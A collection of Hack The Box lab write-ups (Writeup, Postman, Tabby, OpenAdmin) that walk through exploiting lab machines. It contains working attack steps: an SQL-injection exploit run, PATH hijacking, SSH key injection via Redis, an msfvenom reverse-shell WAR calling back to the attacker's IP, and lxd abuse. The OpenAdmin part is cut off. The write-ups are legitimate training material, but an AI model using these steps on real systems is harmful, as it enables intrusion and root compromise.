13 | # Writeup [Easy]
14 |
15 | 
16 |
17 | ***
18 |
19 | ### Improved ability:
20 |
21 | - CVE Research
22 | - Source code review
23 | - PATH based privilege escalation
24 |
25 | ### Used tools:
26 |
27 | - nmap
28 | - searchsploit
29 | - pspy64
30 |
31 | ***
32 |
33 |
34 |
35 | ## Introduction & Foothold:
36 |
37 | Let's start with a common full **nmap** scan on the box:
38 |
39 | ```bash
40 | $ nmap -A 10.10.10.138
41 | ```
42 |
43 | ![[attachments/1.png]]
44 |
45 | The only available ports are the **port 22** (with _OpenSSH 7.4p1_) and the **port 80**, running _Apache httpd 2.4.25_.
46 | Because of this version of OpenSSH doesn't have known vulnerability, let's analyse the root and `/writeup/` folder (contained into the _robots.txt_) with a web browser.
47 |
48 | Once inside the root, we will prompted with an old-school floppy-disk background and a tips saying that because the site was attacked, it has been implemented a **DoS protection** that potentially can block us from performing brute-force enumeration.
49 |
50 | ![[attachments/2.png]]
51 |
52 | Let's move analyse the `/writeup/` folder:
53 |
54 | ![[attachments/3.png]]
55 |
56 | Here we can find some old writeups, but nothing very useful.
57 | However, looking at the **source code**, we are able to find the first important information: the **CMS type**.
58 |
59 | ![[attachments/4.png]]
60 |
61 | Now that we know our target use **CMS Made Simple**, we can search online for public exploit.
62 | Suddenly, though the usage of **searchsploit** we found the right script to compromise our target
63 |
64 | ```bash
65 | $ searchsploit 'cms made simple'
66 | --------------------------------------------------------------------------------------------------------------------
67 | Exploit Title | Path
68 | ---------------------------------------------------------------------------------------------------------------------
69 | CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | exploits/php/remote/46627.rb
70 | CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | exploits/php/webapps/26217.html
71 | CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26298.txt
72 | CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | exploits/php/webapps/29272.txt
73 | ...
74 | CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
75 | ```
76 |
77 |
78 |
79 | ## Gaining access as jkr
80 |
81 | Analysing every record, notice how the **SQL injection exploit** (_46635_) is valid for every version under the 2.2.10.
82 | Download and execute the script!
83 |
84 | ```bash
85 | $ searchsploi -m 46635
86 | $ python 46635.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlist/rockyou.txt
87 | [+] Salt for password found: 5a599ef579066807
88 | [+] Username found: jkr
89 | [+] Email found: jkr@writeup.htb
90 | [+] Password found: 62def4866937f08cc13bab43bb14e6f7
91 | [+] Password cracked: raykayjay9
92 | ```
93 |
94 | Good! We have the user password. Now we can login into the box as **jkr** and proceeds to the privilege escalation phase.
95 |
96 | ```bas
97 | $ ssh jkr@10.10.10.138
98 | $ cat /home/jkr/user.txt
99 | d4e493fd4068af...
100 | ```
101 |
102 |
103 |
104 | ## Privilege Escalation
105 |
106 | After looking for a long time for passwords, misconfiguration or other forms of escalation, I decided to take a closer look to every process running on the machine, so I downloaded **pspy** and launched it.
107 |
108 | ![[attachments/5.png]]
109 |
110 | After a while, mine attention were caught by these few lines:
111 |
112 | ```bash
113 | 2019/10/11 10:35:58 CMD: UID=0 PID=2279 | sshd: [accepted]
114 | 2019/10/11 10:35:58 CMD: UID=102 PID=2280 | sshd: [net]
115 | 2019/10/11 10:36:00 CMD: UID=0 PID=2281 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
116 | 2019/10/11 10:36:00 CMD: UID=0 PID=2282 | run-parts --lsbsysinit /etc/update-motd.d
117 | 2019/10/11 10:36:00 CMD: UID=0 PID=2283 | /bin/sh /etc/update-motd.d/10-uname
118 | 2019/10/11 10:36:00 CMD: UID=0 PID=2284 | /bin/sh /etc/update-motd.d/10-uname
119 | 2019/10/11 10:36:00 CMD: UID=0 PID=2285 | sshd: jkr [priv]
120 | ```
121 |
122 | It seems that every time someone logs in, the `/etc/update-motd.d/10-uname` script is executed.
123 | The contents of the scripts are the following:
124 |
125 | ```bash
126 | jkr@writeup:/etc/update-motd.d$ cat 10-uname
127 | #!/bin/sh
128 | uname -rnsom
129 | jkr@writeup:/etc/update-motd.d$ uname -rnsom
130 | Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
131 | ```
132 |
133 | It is clear the script execute a `uname` without using any kind of path, searching the right binary into the **$PATH** variable.
134 |
135 | In case we are able to write inside one of the directories contained in $PATH and before the script identifies the original uname binary, _we can run arbitrary code as root and execute our escalation_ (that because the `10-uanme` process run with *UID=0*, so it runs as root)
136 |
137 | $PATH contains the following directories:
138 |
139 | ```bash
140 | jkr@writeup:/home/jkr$ ls -l -d /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin
141 | drwxr-xr-x 2 root root 4096 Apr 19 04:24 /bin
142 | drwxr-xr-x 2 root root 4096 Apr 19 04:14 /sbin
143 | drwxr-xr-x 2 root root 20480 Apr 24 13:13 /usr/bin
144 | drwx-wsr-x 2 root staff 20480 Jul 10 17:27 /usr/local/bin
145 | drwx-wsr-x 2 root staff 12288 Jul 10 17:23 /usr/local/sbin
146 | drwxr-xr-x 2 root root 4096 Apr 19 07:31 /usr/sbin
147 | ```
148 |
149 | two of which allow *staff* group users to write into them.
150 |
151 | Because jkr is part of the staff group, we are able to create a custom script named *uname* that will be executed in place of the original script once someone logs in.
152 |
153 | ```bash
154 | jkr@writeup:/etc/update-motd.d$ echo "cat /root/root.txt" > /usr/local/sbin/uname
155 | jkr@writeup:/etc/update-motd.d$ chmod +x /usr/local/sbin/uname
156 | jkr@writeup:/etc/update-motd.d$ exit
157 | root@0xbro:~/Documents/CTF/HTB/Writeup# ssh jkr@10.10.10.138
158 | jkr@10.10.10.138's password:
159 | eeba47f60b48ef92...
160 |
161 | The programs included with the Devuan GNU/Linux system are free software;
162 | the exact distribution terms for each program are described in the
163 | individual files in /usr/share/doc/*/copyright.
164 |
165 | Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
166 | permitted by applicable law.
167 | Last login: Wed Jul 10 17:35:19 2019 from 10.10.15.117
168 | jkr@writeup:~$
169 | ```
170 |
171 | Once this escalation has been found, it is possible get a reverse shell as root rather than performing other actions as superuser.
172 |
173 | Author: 0x*bro*
174 | [](http://creativecommons.org/licenses/by-nc/4.0/)
175 | This work is licensed under a [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).
176 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/Postman.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags: HackTheBox Easy Linux redis ssh-keys-cracking webmin miniserv lateral-movement RCE CVE-2019-12840 B2R
3 | Alias: Postman - 10.10.10.160
4 | ---
5 | # Postman [Easy]
6 |
7 | 
8 |
9 | ***
10 |
11 | ### Improved ability:
12 |
13 | - Redis exploitation
14 | - SSH keys cracking
15 | - Webmin exploitation
16 |
17 | ### Used tools:
18 |
19 | - nmap
20 | - LinEnum.sh
21 | - ssh2john
22 | - john
23 | - metasploit
24 |
25 | ***
26 |
27 | ## Introduction & Foothold
28 |
29 | As always, let's start scanning the box with **nmap**
30 |
31 | ```bash
32 | $ nmap -sV -O -A -p 1-10000 --script=banner -o nmap.txt 10.10.10.160
33 | # Nmap 7.80 scan initiated Wed Feb 26 21:38:20 2020 as: nmap -sV -O -A -p 1-10000 --script=banner -o nmap.txt 10.10.10.160
34 | Nmap scan report for 10.10.10.160
35 | Host is up (0.047s latency).
36 | Not shown: 9996 closed ports
37 | PORT STATE SERVICE VERSION
38 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
39 | |_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
40 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
41 | |_http-server-header: Apache/2.4.29 (Ubuntu)
42 | 6379/tcp open redis Redis key-value store 4.0.9
43 | 10000/tcp open http MiniServ 1.910 (Webmin httpd)
44 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
45 | TCP/IP fingerprint:
46 | OS:SCAN(V=7.80%E=4%D=2/26%OT=22%CT=1%CU=38345%PV=Y%DS=2%DC=T%G=Y%TM=5E56D77
47 | OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS
48 | OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
49 | OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
50 | OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
51 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
52 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
53 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
54 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
55 | OS:=S)
56 |
57 | Network Distance: 2 hops
58 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
59 |
60 | TRACEROUTE (using port 110/tcp)
61 | HOP RTT ADDRESS
62 | 1 46.46 ms 10.10.14.1
63 | 2 46.53 ms 10.10.10.160
64 |
65 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
66 | # Nmap done at Wed Feb 26 21:39:17 2020 -- 1 IP address (1 host up) scanned in 57.09 seconds
67 | ```
68 |
69 | We can notice the presence of four open ports: two web server on the numbers 80 and 1000 and a **Redis** daemon on the number 6379.
70 |
71 | Enumerating the two web services, we discovered that for this specific version of **MiniServ** multiple authenticated exploits exists... they could come in handy later.
72 |
73 | About Redis, we can enumerate the service through some **NSE scripts**, however without getting anything useful except the specific Linux box version (_Linux 4.15.0-58-generic x86_64_)
74 |
75 | ```bash
76 | $ nmap --script redis-info -sV -p 6379 10.10.10.160
77 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 22:20 CET
78 | Nmap scan report for 10.10.10.160
79 | Host is up (0.047s latency).
80 |
81 | PORT STATE SERVICE VERSION
82 | 6379/tcp open redis Redis key-value store 4.0.9 (64 bits)
83 | | redis-info:
84 | | Version: 4.0.9
85 | | Operating System: Linux 4.15.0-58-generic x86_64
86 | | Architecture: 64 bits
87 | | Process ID: 608
88 | | Used CPU (sys): 81.29
89 | | Used CPU (user): 27.25
90 | | Connected clients: 2
91 | | Connected slaves: 0
92 | | Used memory: 840.94K
93 | | Role: master
94 | | Bind addresses:
95 | | 0.0.0.0
96 | | ::1
97 | | Client connections:
98 | | 10.10.14.12
99 | |_ 10.10.14.27
100 | ```
101 |
102 | About [Redis](https://redis.io/documentation):
103 |
104 | > *Redis* is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.
105 |
106 | In order to works properly, the program needs a specific user, who can read and write on physical memory ... in short, a 100% working user.
107 | Because of that, _once we log into the service, we can read and write into the redis `/home` directory_, and because we know that the user has a valid shell and a valid home, **we can inject our personal SSH key** in order to gain access through SSH without knowing the right password.
108 |
109 | 
110 |
111 | First, I **generated a new pair of SSH key** with the `ssh-keygen` command, next, inside the redis home directory, I **created the **`/.ssh` **dir and the `authorized_keys` file**, inside of which I wrote my public SSH key.
112 | After those steps, finally I was able to login as redis user, without really know its password.
113 |
114 | ## Lateral movement to Matt
115 |
116 | As always, upload and run **LinEnum.sh**
117 |
118 | ```bash
119 | redis@Postman:/tmp$ ./LinEnum.sh
120 |
121 | #########################################################
122 | # Local Linux Enumeration & Privilege Escalation Script #
123 | #########################################################
124 | # www.rebootuser.com
125 | # version 0.982
126 |
127 | [-] Debug Info
128 | [+] Thorough tests = Disabled
129 |
130 |
131 | Scan started at:
132 | Thu Feb 27 09:44:23 GMT 2020
133 |
134 |
135 | ### SYSTEM ##############################################
136 | [-] Kernel information:
137 | Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
138 |
139 |
140 | [-] Kernel information (continued):
141 | Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019
142 |
143 |
144 | [-] Specific release information:
145 | DISTRIB_ID=Ubuntu
146 | DISTRIB_RELEASE=18.04
147 | DISTRIB_CODENAME=bionic
148 | DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
149 | NAME="Ubuntu"
150 | VERSION="18.04.3 LTS (Bionic Beaver)"
151 | ID=ubuntu
152 | ID_LIKE=debian
153 | PRETTY_NAME="Ubuntu 18.04.3 LTS"
154 | VERSION_ID="18.04"
155 | HOME_URL="https://www.ubuntu.com/"
156 | SUPPORT_URL="https://help.ubuntu.com/"
157 | BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
158 | PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
159 | VERSION_CODENAME=bionic
160 | UBUNTU_CODENAME=bionic
161 |
162 | [-] Hostname:
163 | Postman
164 |
165 | ...
166 |
167 | [-] Location and Permissions (if accessible) of .bak file(s):
168 | -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak
169 | -rw------- 1 root root 695 Aug 25 2019 /var/backups/group.bak
170 | -rw------- 1 root shadow 577 Aug 25 2019 /var/backups/gshadow.bak
171 | -rw------- 1 root shadow 935 Aug 26 2019 /var/backups/shadow.bak
172 | -rw------- 1 root root 1382 Aug 25 2019 /var/backups/passwd.bak
173 |
174 |
175 | [-] Any interesting mail in /var/mail:
176 | total 8
177 | drwxrwsr-x 2 root mail 4096 Aug 24 2019 .
178 | drwxr-xr-x 13 root root 4096 Aug 25 2019 ..
179 |
180 |
181 | ### SCAN COMPLETE ####################################
182 | ```
183 |
184 | Among the thousands of lines of information returned by the tool, we notice immediately that **there is a publicly readable RSA-key's backup file belonging to Matt**, the user of the machine.
185 | Extrapolate and bring it on our local machine in order to try to crack it.
186 |
187 | In order to crack an SSH key, first we need to generate an hash from it. To achieve this tasks, we can use **ssh2john**. Next, after having generate the hash, we can crack it using **john**:
188 |
189 | 
190 |
191 | Gathered the password, try logging in via SSH with Matt user ... but it does not work.
192 | Not a problem, because the same password is valid for switching to the Matt user with the **su** command.
193 |
194 | ## Privilege Escalation
195 |
196 | The privilege escalation process can be achieved easily with **Metasploit**.
197 |
198 | During the enumeration phase we found an **authenticated Remote Command Execution exploit** fitting the targeted Webmin version: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/webmin_packageup_rce.md
199 |
200 | > This module exploits an arbitrary command execution vulnerability in **Webmin 1.910** and lower versions. Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
201 |
202 | So let's load the module, compile the appropriate fields and execute the exploit. What we will get is a shell with root permissions
203 |
204 | 
205 |
206 | ```
207 | A hacker does for love what others would not do for money.
208 | - Laura Creighton
209 | ```
210 |
211 | Author: 0x*bro*
212 | [](http://creativecommons.org/licenses/by-nc/4.0/)
213 | This work is licensed under a [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/Tabby.md:
--------------------------------------------------------------------------------
1 | ---
2 | Tags: HackTheBox Easy Linux LFI WAR tomcat cracking-zip-files lxd-privesc B2R
3 | Alias: Tabby - 10.10.10.194
4 | ---
5 |
6 | # 10.10.10.194 - Tabby [Easy]
7 |
8 | ^780615
9 |
10 | 
11 |
12 | ***
13 |
14 | ### Improved skills:
15 | - LFI
16 | - Tomcat WAR exploitation
17 | - Cracking .zip files
18 | - lxd Privilege Escalation
19 |
20 | ### Used tools:
21 | - nmap
22 | - gobuster
23 | - msfvenom
24 | - LinEnum.sh
25 | - fcrackzip
26 |
27 | ___
28 |
29 |
30 | ## Introduction & Foothold
31 |
32 | **Tabby** is an _easy_ HTB machine focused on the manually exploitation of a **Tomacat** server using a **.WAR** reverse shell and the exploitation of a misconfigured group permission which allow to escalate to root abusing **lxd** rights.
33 |
34 | Let's start as always with an **nmap** scan:
35 |
36 | ```bash
37 | root@kali:~/HackTheBox# nmap -Pn -sCV -p22,80,8080 -oN nmap/Basic_10.10.10.194.nmap 10.10.10.194
38 | PORT STATE SERVICE VERSION
39 | 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
40 | 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
41 | |_http-server-header: Apache/2.4.41 (Ubuntu)
42 | |_http-title: Mega Hosting
43 | 8080/tcp open http Apache Tomcat 9.0.31
44 | |_http-open-proxy: Proxy might be redirecting requests
45 | |_http-title: Apache Tomcat
46 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
47 | ```
48 |
49 | We find out that there are three services running on the box, **two of which** are **web servers** (an *Apache httpd 2.4.41* and an *Apache Tomcat 9.0.31*).
50 |
51 | Visiting the first site we discover that the **host** of the box is **_megahosting.htb_**. In order to properly enumerate the box we need to resolve it correctly
52 |
53 | `cat "10.10.10.194 megahosting.it" >> /etc/hosts`
54 |
55 | Now that we are effectively ready, let's start enumerating every page of the first web server.
56 |
57 | 
58 |
59 | After few minutes I found the **_http://megahosting.htb/news.php?file=statement_** page, which results to be vulnerable to **Local File Inclusion** (LFI).
60 |
61 | 
62 |
63 | 
64 |
65 | Because we got an LFI vulnerability, the logical next step was to try to exploit it in order to get a Remote Code Execution, but unfortunately none of the existing methods worked... so I decided to start to enumerate the second web server (**tomcat**), looking for another entry point.
66 |
67 | ```bash
68 |
69 | root@kali:~/HackTheBox# gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt
70 | ===============================================================
71 | Gobuster v3.0.1
72 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
73 | ===============================================================
74 | [+] Url: http://10.10.10.194:8080/
75 | [+] Threads: 10
76 | [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
77 | [+] Status codes: 200,204,301,302,307,401,403
78 | [+] User Agent: gobuster/3.0.1
79 | [+] Extensions: php,html,txt
80 | [+] Timeout: 10s
81 | ===============================================================
82 | 2020/06/22 16:05:04 Starting gobuster
83 | ===============================================================
84 | /index.html (Status: 200)
85 | /docs (Status: 302)
86 | /examples (Status: 302)
87 | /manager (Status: 302)
88 | ```
89 |
90 | Among all the various directories, *__/manager__* immediately caught my attention: trying to logging in, the server reveals which file contains the credentials, allowing us to use the **LFI** to get them.
91 |
92 | 
93 |
94 | Finding ***tomcat-users.xml*** was a pain as the installation of the web server was done *without following standards paths and rules*, however, after a couple of hours I was able to read the file, located in ***/usr/share/tomcat9/etc/tomcat-users.xml***
95 |
96 | 
97 |
98 | 
99 |
100 | Good! Now we are able to login into the ***/manager*** directory and proceeds.
101 |
102 | Since the tomcat user are assigned the roles of **admin-gui** and **manager-script**, he has the permission to access the *host-manager webapp via web gui* (from which nothing can be done) but also to interact ***via cli with the manager webapp***, which allows us to upload **.war files** to the server (see the [official documentation](https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html)).
103 |
104 | Once we find the way, let's **create our reverse shell** through **msfconsole**
105 |
106 | ```bash
107 | root@kali:/var/www/html# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.18 LPORT=9876 -f war > maoutis.war
108 | Payload size: 1095 bytes
109 | Final size of war file: 1095 bytes
110 |
111 | root@kali:/var/www/html# ls -al maoutis.war
112 | -rw-r--r-- 1 root root 1095 Jun 29 19:08 maoutis.war
113 | ```
114 |
115 | load it on the server
116 |
117 | ```bash
118 | root@kali:~/HackTheBox/Machine/Tabby/files# curl -u 'tomcat':'$3cureP4s5w0rd123!' -T maoutis.war 'http://10.10.10.194:8080/manager/text/deploy?path=/maoutis'
119 | OK - Deployed application at context path [/maoutis]
120 | root@kali:~/HackTheBox/Machine/Tabby/files# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
121 | OK - Listed applications for virtual host [localhost]
122 | /:running:0:ROOT
123 | /maoutis:running:0:maoutis
124 | /examples:running:0:/usr/share/tomcat9-examples/examples
125 | /host-manager:running:1:/usr/share/tomcat9-admin/host-manager
126 | /manager:running:0:/usr/share/tomcat9-admin/manager
127 | /docs:running:0:/usr/share/tomcat9-docs/docs
128 | and run it to get access as *tomcat* user.
129 | ```
130 |
131 | ```bash
132 | root@kali:~/HackTheBox/Machine/Tabby/files# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/maoutis/
133 | ```
134 |
135 | ```bash
136 | root@kali:~# nc -lvp 9876
137 | python3 -c 'import pty; pty.spawn("/bin/bash")'
138 | tomcat@tabby:/var/lib/tomcat9$ export TERM=screen
139 | CTRL+Z
140 | root@kali:~/HackTheBox# stty raw -echo
141 | root@kali:~/HackTheBox# fg
142 |
143 | tomcat@tabby:/var/lib/tomcat9$
144 | ```
145 |
146 |
147 |
148 | ## Lateral Movement to ash
149 |
150 | Once gained the shell, further enumeration reveals that the user of the box is **ash**.
151 |
152 | Running **LinEnum.sh** we discovered a **.zip backup file** inside ***/var/www/html/files/*** which require to be cracked in order to be unzipped. Let's use **fcrackzip** in order to crack the archive.
153 |
154 | ```bash
155 | root@kali:~/HackTheBox/Machine/Tabby/files# fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' 16162020_backup.zip
156 |
157 | PASSWORD FOUND!!!!: pw == admin@it
158 | ```
159 |
160 | Password found! While inside the archive we didn't find anything useful, trying to use the password to switch to **ash** reveals that the same *password has been reused*.
161 |
162 | ```bash
163 | tomcat@tabby:/var/www/html/files$ su ash
164 | Password: admin@it
165 | ash@tabby:/var/www/html/files$
166 | uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
167 | ```
168 |
169 | Well done! We are ash!
170 |
171 |
172 |
173 | ## Privilege Escalation
174 |
175 | Running again **LinEnum.sh** it reveals that we are members of the **lxd group** and that exists a way to ***abuse this permission*** in order *to became root*.
176 | Searching on Google I found [this](https://www.hackingarticles.in/lxd-privilege-escalation/) article, which describes how an account on the system that is a member of the lxd group is able to escalate the root privilege by exploiting the features of LXD.
177 |
178 | 1. **Download** the **lxd-alpine-builder** locally on the kali machine and built it as root
179 |
180 | ```bash
181 | $git clone https://github.com/saghul/lxd-alpine-builder.git
182 | $cd lxd-alpine-builder
183 | $sudo bash build-alpine
184 | ```
185 |
186 | Probably will appear errors like *"tar: Ignoring unknow ... "*. Don't worry and continue with the privilege escalation process.
187 |
188 | 2. **Upload** the **.tar** file on the **ash home** directory and **import** it **inside lxc**
189 |
190 | 
191 |
192 | Once finished, we will be root!
193 |
194 |
195 |
196 | ## Trophy
197 |
198 | > If you can't give me poetry, can't you give me poetical science?
199 | > \- Ada Lovelace
200 |
201 |
202 |
203 | ## License
204 |
205 | Author: 0x*bro*
206 |
207 |
208 | This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/OpenAdmin.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HackTheBox
4 | - Easy
5 | - Linux
6 | - code-review
7 | - lateral-movement
8 | - port-forwarding
9 | - ssh-keys-cracking
10 | - GTFObins
11 | - OpenNetAdmin
12 | - nano-privesc
13 | - command-injection
14 | - RCE
15 | - password-reuse
16 | - hardcoded-credentials
17 | - B2R
18 | aliases:
19 | - 10.10.10.171
20 | ---
21 |
22 | # 10.10.10.171 - OpenAdmin [Easy]
23 |
24 | 
25 |
26 | ---
27 |
28 | ### Improved skills:
29 |
30 | - Enumeration
31 | - Apache configuration review
32 | - Code review
33 | - Lateral movement
34 | - Port Forwarding
35 | - SSH keys cracking
36 | - nano privilege escalation (GTFO)
37 |
38 | ### Used tools:
39 |
40 | - nmap
41 | - dirbuster
42 | - searchsploit
43 | - metasploit
44 | - pspy64
45 | - SwitchyOmega
46 | - ssh2john
47 | - john
48 |
49 | ***
50 |
51 |
52 |
53 | ## Introduction & Foothold
54 |
55 | Let's start as every time with an **nmap** scan:
56 |
57 | ```bash
58 | root@kali:~/Documents/CTF/Machine/OpenAdmin# nmap -sV -A -O 10.10.10.171
59 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-11 11:28 CET
60 | Nmap scan report for 10.10.10.171
61 | Host is up (0.060s latency).
62 | Not shown: 998 closed ports
63 | PORT STATE SERVICE VERSION
64 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65 | | ssh-hostkey:
66 | | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
67 | | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
68 | |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
69 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
70 | |_http-server-header: Apache/2.4.29 (Ubuntu)
71 | |_http-title: Apache2 Ubuntu Default Page: It works
72 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
73 | TCP/IP fingerprint:
74 | OS:SCAN(V=7.80%E=4%D=2/11%OT=22%CT=1%CU=31767%PV=Y%DS=2%DC=T%G=Y%TM=5E4281D
75 | OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
76 | OS:(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
77 | OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
78 | OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
79 | OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
80 | OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
81 | OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
82 | OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
83 | OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
84 |
85 | Network Distance: 2 hops
86 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
87 |
88 | TRACEROUTE (using port 1720/tcp)
89 | HOP RTT ADDRESS
90 | 1 61.58 ms 10.10.14.1
91 | 2 61.83 ms 10.10.10.171
92 |
93 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
94 | Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds
95 | ```
96 |
97 | We can see that only two services are exposed: a non-vulnerable SSH version, and an Apache web server on port 80 with a default page.
98 |
99 | In order to enumerate all the possible sub-pages of the site and find an entry point, let's start a **Dirbuster** scan.
100 | Among the first results of the tool execution we find these records:
101 |
102 | `/`
103 | `/index.php`
104 | `/icons/`
105 | `/music/`
106 | `/ona/`
107 |
108 | Visiting each page, arrived at http://10.10.10.171/ona/ we realize that in front of us we have a **vulnerable version of OpenNetAdmin**, a web application for the network administration.
109 | Let's use **searchsploit** to find out if there are exploits fitting this particular version... the [47772](https://www.exploit-db.com/exploits/47772) seems to be what we need, a **Command Injection** on **OpenNetAdmin 18.1.1**. We just have to download it, import it into **metasploit**, set the correct parameters and run it.
110 |
111 |
112 | ## Lateral movement to Jimmy
113 |
114 | Analyzing the contents of the `/etc/passwd` file we notice that the main users on the box are actually two: **Jimmy** and **Joanna**.
115 |
116 | After having take a look at the machine and launching _LinEnum.sh_ without success, I decided to check better the processes of the machine via **pspy64**.
117 |
118 | 
119 |
120 | By observing the various processes, one particular line attracts my attention:
121 |
122 | `2020/02/14 22:35:20 CMD: UID=33 PID=7150 | sh -c php -l /opt/ona/www/local/config/database_settings.inc.php `
123 |
124 | I decide to analyze the contents of the `database_settings.inc.php` file:
125 |
126 | ```php
127 |
131 | array (
132 | 'databases' =>
133 | array (
134 | 0 =>
135 | array (
136 | 'db_type' => 'mysqli',
137 | 'db_host' => 'localhost',
138 | 'db_login' => 'ona_sys',
139 | 'db_passwd' => 'n1nj4W4rri0R!',
140 | 'db_database' => 'ona_default',
141 | 'db_debug' => false,
142 | ),
143 | ),
144 | 'description' => 'Default data context',
145 | 'context_color' => '#D3DBFF',
146 | ),
147 | );
148 | ```
149 |
